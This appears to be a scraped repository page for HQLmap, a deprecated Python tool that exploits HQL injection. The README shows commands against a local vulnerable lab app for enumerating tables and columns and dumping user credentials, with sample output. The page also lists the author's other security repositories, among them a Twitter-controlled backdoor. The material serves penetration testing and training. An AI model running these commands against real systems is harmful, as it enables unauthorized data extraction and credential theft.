• This repository has been archived on 19/Feb/2021
  • Stars
    star
    223
  • Rank 178,458 (Top 4 %)
  • Language
    Python
  • License
    MIT License
  • Created almost 11 years ago
  • Updated almost 5 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

(Deprecated) HQLmap, Automatic tool to exploit HQL injections

HQLMap

This project has been created to exploit HQL Injections. The tool has been written in Python and is released under MIT License. Future development : I have in mind to develop specific module for SQLmap.

Where can you try the tool ?

If you want a fast vulnerable environment where you can try the tool, I would recommend using RopeyTasks : https://github.com/continuumsecurity/RopeyTasks/

Moreover, if you want further information regarding HQLi, check this blog post : http://blog.h3xstream.com/2014/02/hql-for-pentesters.html

Installation

To install this project, you just have to clone this project by typing :

git clone [email protected]:PaulSec/HQLmap.git

Usage

TO use this project, go in the directory :

cd HQLmap

And launch the project :

python HQLmap.py

Usage is then displayed :

Usage: HQLmap.py [options]

Options:
  -h, --help            show this help message and exit
  --url=URL             qURL to pentest
  --cookie=COOKIE       Cookie to test it
  --param=PARAM         Param to test
  --postdata=POSTDATA   Postdata (POST Method)  
  --message=BLIND_HQLI_MESSAGE
                        Message appearing while Blind HQLi
  --tables              Tries to gather as much tables as possible (With
                        Bruteforce)
  --T=TABLE             Name of the table you want to get
  --table_name_file=FILE_TABLE
                        DB file for name of tables
  --columns             Tries to gather as much columns as possible (With
                        Bruteforce)
  --C=COLUMN            Name of the column you want to get
  --column_name_file=FILE_COLUMN
                        DB file for name of columns
  --check               Check if host is vulnerable
  --user                Tries to get user() from dbms
  --count               Get count of specified table(s)
  --dump                Dump specified table(s) / column(s)
  --results             Enumerate results after session
  --verbose             Verbose mode

Usage

This part includes different scenarios.

Checking if host is vulnerable

python HQLmap.py --url="http://localhost:9110/ropeytasks/task/search?q=test&search=Search" --param=q --cookie="JSESSIONID=D50C4AD5BA0F05FA426CF660D9E069B7" --check

The output is really simple :

Host seems vulnerable.

Checking with POSTDATA

python HQLmap.py --url="http://localhost:9110/ropeytasks/task/search?q=test&search=Search" --param=q --cookie="JSESSIONID=A101D5D76A260E9ECD2E10ADE9DF0E47" --T=User --results --dump --postdata="username=Test&password=Test!!!"

Enumerating tables

$ python HQLmap.py --url="http://localhost:9110/ropeytasks/task/search?q=test&search=Search" --param=q --cookie="JSESSIONID=D50C4AD5BA0F05FA426CF660D9E069B7" --tables

Here is the output :

[!] Table User has been found.
[!] Table Task has been found.
[-] Table News does not exist.
[-] Table Test does not exist.

By performing such enumeration, the scanner is using default file for the name of the tables if not specified. The default file is : db/tables.db

Enumeration columns

python HQLmap.py --url="http://localhost:9110/ropeytasks/task/search?q=test&search=Search" --param=q --cookie="JSESSIONID=D50C4AD5BA0F05FA426CF660D9E069B7" --tables --columns
[!] Table User has been found.
[!] Table Task has been found.
[-] Table News does not exist.
[-] Table Test does not exist.
[!] Column Id has been found in table Task
[-] Column username in Task does not exist.
[-] Column password in Task does not exist.
[!] Column Status has been found in table Task
[-] Column user_id in Task does not exist.
(...)
[!] Column Password has been found in table User
[-] Column status in User does not exist.
[-] Column user_id in User does not exist.
[!] Column Email has been found in table User
[!] Column Firstname has been found in table User
[!] Column Lastname has been found in table User

By performing such enumeration, the scanner is using default file for the name of the tables AND for the name of the columns. Default files are :

For tables : db/tables.db For columns : db/columns.db

Checking existence of a specific table

python HQLmap.py --url="http://localhost:9110/ropeytasks/task/search?q=test&search=Search" --param=q --cookie="JSESSIONID=D50C4AD5BA0F05FA426CF660D9E069B7" --T=foo

And the output :

[-] Table foo does not exist.

Enumerating columns of a specific table

python HQLmap.py --url="http://localhost:9110/ropeytasks/task/search?q=test&search=Search" --param=q --cookie="JSESSIONID=D50C4AD5BA0F05FA426CF660D9E069B7" --T=User --columns

And the output :

[!] Table User has been found.
[!] Column Id has been found in table User
[!] Column Username has been found in table User
[!] Column Password has been found in table User
[-] Column status in User does not exist.
[-] Column user_id in User does not exist.
[!] Column Email has been found in table User
[!] Column Firstname has been found in table User
[!] Column Lastname has been found in table User

Checking the existence of a specific column for a specific table

python HQLmap.py --url="http://localhost:9110/ropeytasks/task/search?q=test&search=Search" --param=q --cookie="JSESSIONID=D50C4AD5BA0F05FA426CF660D9E069B7" --T=User --C=bar

And the output :

[!] Table User has been found.
[-] Column bar in User does not exist.

Fingerprinting options

Retrieving the count of a table

python HQLmap.py --url="http://localhost:9110/ropeytasks/task/search?q=test&search=Search" --param=q --cookie="JSESSIONID=D50C4AD5BA0F05FA426CF660D9E069B7" --message="Eggs, Milk and Cheese baby, yeah." --T=User --count

Or for all tables :

python HQLmap.py --url="http://localhost:9110/ropeytasks/task/search?q=test&search=Search" --param=q --cookie="JSESSIONID=D50C4AD5BA0F05FA426CF660D9E069B7" --message="Eggs, Milk and Cheese baby, yeah." --tables --count

And the output :

[!] Table User has been found.
[!] Count(*) of User : 3

Retrieving user of the database

To do such action, you need to specify a table (or all with --tables flag) and add --user flag this way :

python HQLmap.py --url="http://localhost:9110/ropeytasks/task/search?q=test&search=Search" --param=q --cookie="JSESSIONID=D50C4AD5BA0F05FA426CF660D9E069B7" --message="Eggs, Milk and Cheese baby, yeah." --T=User --user

And the output (after few secs) :

[!] Table User has been found.
[!] Username of Database found : SA

To retrieve the user, I implemented an algorithm really similar to a "variable" dichotomy.

Dumping database

All tables from database

python HQLmap.py --url="http://localhost:9110/ropeytasks/task/search?q=test&search=Search" --param=q --cookie="JSESSIONID=83C59DCB04A6DC954E4E1EEC2BB36EF6" --tables --columns --dump

And the output :

(redacted)
[Task]
  [Name]
     - Bob's shopping
     - Alice's shopping
[Task]
  [User_Id]
     - 1
     - 2
[User]
  [Id]
     - 1
     - 2
     - 3
[User]
  [Username]
     - bob
     - alice
     - admin
(redacted)

Specific table from database

python HQLmap.py --url="http://localhost:9110/ropeytasks/task/search?q=test&search=Search" --param=q --cookie="JSESSIONID=83C59DCB04A6DC954E4E1EEC2BB36EF6" --T=User --columns --dump

And the output:

[User]
  [Id]
     - 1
     - 2
     - 3
[User]
  [Username]
     - bob
     - alice
     - admin
[User]
  [Password]
     - password
     - password
     - password
[User]
  [Email]
     - [email protected]
     - [email protected]
     - [email protected]
[User]
  [Firstname]
     - Robert
     - Alice
     - Administrator
[User]
  [Lastname]
     - McBride
     - O'Reilly
     - Reynolds

Specific column from database

python HQLmap.py --url="http://localhost:9110/ropeytasks/task/search?q=test&search=Search" --param=q --cookie="JSESSIONID=83C59DCB04A6DC954E4E1EEC2BB36EF6" --T=User --C=username --dump

And the output :

[!] Table User has been found.
[!] Column Username has been found in table User
[User]
  [username]
     - bob
     - alice
     - admin

Conclusion (& License)

Feel free to give feedbacks and ask for new features.

Project released under MIT license.

More Repositories

1

awesome-sec-talks

A collected list of awesome security talks
3,999
star
2

awesome-windows-domain-hardening

A curated list of awesome Security Hardening techniques for Windows.
1,737
star
3

twittor

A fully featured backdoor that uses Twitter as a C&C server
Python
759
star
4

API-dnsdumpster.com

(Unofficial) Python API for https://dnsdumpster.com/
Python
274
star
5

CSRFT

A lightweight CSRF Toolkit for easy Proof of concept
Python
174
star
6

Shodan-Firefox-Addon

Shodan Firefox Add-on
JavaScript
151
star
7

Shodan.io-mobile-app

Official repository for the Shodan.io mobile Application
TypeScript
138
star
8

crt.sh

(Unofficial) Python API for https://crt.sh
Python
129
star
9

osint-facebook-reset-password

Python util to retrieve full display name and profile picture from a single email address
Python
95
star
10

skype-osint

Python OSINT Tool to retrieve information from Skype
Python
74
star
11

API-EZTV.it

(Unofficial) Python API for the torrent website EZTV.it
Python
72
star
12

SPIPScan

SPIP (CMS) Scanner for penetration testing purpose written in Python
Python
69
star
13

metasearch-public

Stop searching for sample hashes on 10 different sites.
Python
65
star
14

API-malwr.com

(Unofficial) Python API for https://malwr.com/
Python
62
star
15

go-http-monitor

A (dead-simple) Golang utility allowing you to monitor HTTP endpoints
Go
38
star
16

cybercrime-tracker.net

(Unofficial) Python API for cybercrime-tracker.net
Python
37
star
17

API-InstagramLocation

Python OSINT Tool to retrieve pictures from a specific location using Instagram API
Python
35
star
18

pepito

Finds sensitive stuff in your git repository by specifying terms to look for
Python
31
star
19

Shodan-mattermost

Mattermost - Shodan Slash command
Python
30
star
20

VNWA

Vulnerable Node.js Web Application to pratice with your pentesting skills
JavaScript
21
star
21

API-namechk.com

(Unofficial) Python API for http://namechk.com
Python
19
star
22

HTTP-traceroute

HTTP-traceroute in Go
Go
18
star
23

ransomware-tracker

(Unofficial) Python API for http://ransomwaretracker.abuse.ch/tracker/
Python
16
star
24

API-netcraft.com

(Unofficial) Python API for http://netcraft.com
Python
15
star
25

SearchShodan

This is a basic example of how to search into Shodan using the ShodanAPI.
Python
15
star
26

exploitdb-json-api

JSON API for ExploitDB Website
JavaScript
15
star
27

API-checkusernames.com

(Unofficial) Python API for http://checkusernames.com
Python
13
star
28

XSS-Callback

A lightweight HTTP Server that exploits XSS victim's session automatically
JavaScript
11
star
29

SSLBlackList

(Unofficial) Python API for https://sslbl.abuse.ch/
Python
11
star
30

WhatHashIsIt

# Deprecated # "What hash is it?" service allows you to identify the hashing functions used of your hash(es) based on their characteristics.
JavaScript
10
star
31

Social-Markdown

"Dillinger.io clone" allowing live concurrent editing.
JavaScript
10
star
32

TVShowsManager

Basic manager to download your TV Shows automatically with EZTV.it website.
Python
9
star
33

recon-scan

Recon tool using Yatedo and Pipl
Python
9
star
34

paulsec.github.io

Repository containing my portfolio
HTML
8
star
35

censysio

Censysio Python wrapper
Python
7
star
36

Python-plugins

Quick Python project with a simple Plugin architecture
Python
7
star
37

API-HaveIBeenPwned

(Unofficial) Python API for HaveIBeenPwned Website
Python
7
star
38

what-is-this-browser

Python script that tells you what's the potential configuration behind a User-Agent
Python
6
star
39

markovobfuscate

Python library and tools to obfuscate data based on Markov models built off the same data
Python
6
star
40

drupal-enum-users

(Python) Quick script to enumerate users on a Drupal instance
Python
6
star
41

burito

# Deprecated # Burito, Hydra-like tool to audit Web application using forms containing server-side generated params.
Python
6
star
42

API-Email-Format

email-format.com (Unofficial) Python API
Python
5
star
43

Virus-Total-Dump

Python script that dumps behavourial information about a list of hashes
Python
5
star
44

API-Yatedo

(Unofficial) Python API for Yatedo Website
Python
5
star
45

shellpot-nodejs

Honeypot written in Node.js for the Shellshock vulnerability
JavaScript
4
star
46

filesharer-nodejs

File sharer based on Node.js using AES encryption for your files
JavaScript
4
star
47

API-ShouldIChangeMyPassword

(Unofficial) Python API for ShouldIChangeMyPassword Website
Python
4
star
48

node-ip-info

Retrieves information about a specific IP
JavaScript
4
star
49

Raspberry-APT

# Deprecated # Raspberry APT - Automatic Pwn Tool suite to perform automatic pentest.
Python
4
star
50

feedrss-python

Quick command line tool to retrieve RSS blog post ordered by published date
Python
3
star
51

slidecast

Python utility to show pictures in a slideshow on your chromecast
Python
3
star
52

JSONLogger

JSONLogger - HTTP Proxy that logs JSON HTTP Response in the console
JavaScript
3
star
53

API-Pipl

(Unofficial) Python API for Pipl Website
Python
3
star
54

wordpress-vulnscan-add-on

Mozilla Add-on that retrieves potential vulnerabilities based on the Wordpress website you're visiting
2
star
55

kafka-boilerplate-docker

Kafka boilerplate example with docker-compose
Python
2
star
56

clermontech-fastapi

Python
1
star
57

Telegram-bot

Python bot to control your server through Telegram
1
star
58

API-oldpiratebay

(Unofficial) Python API for Old Pirate Bay
Python
1
star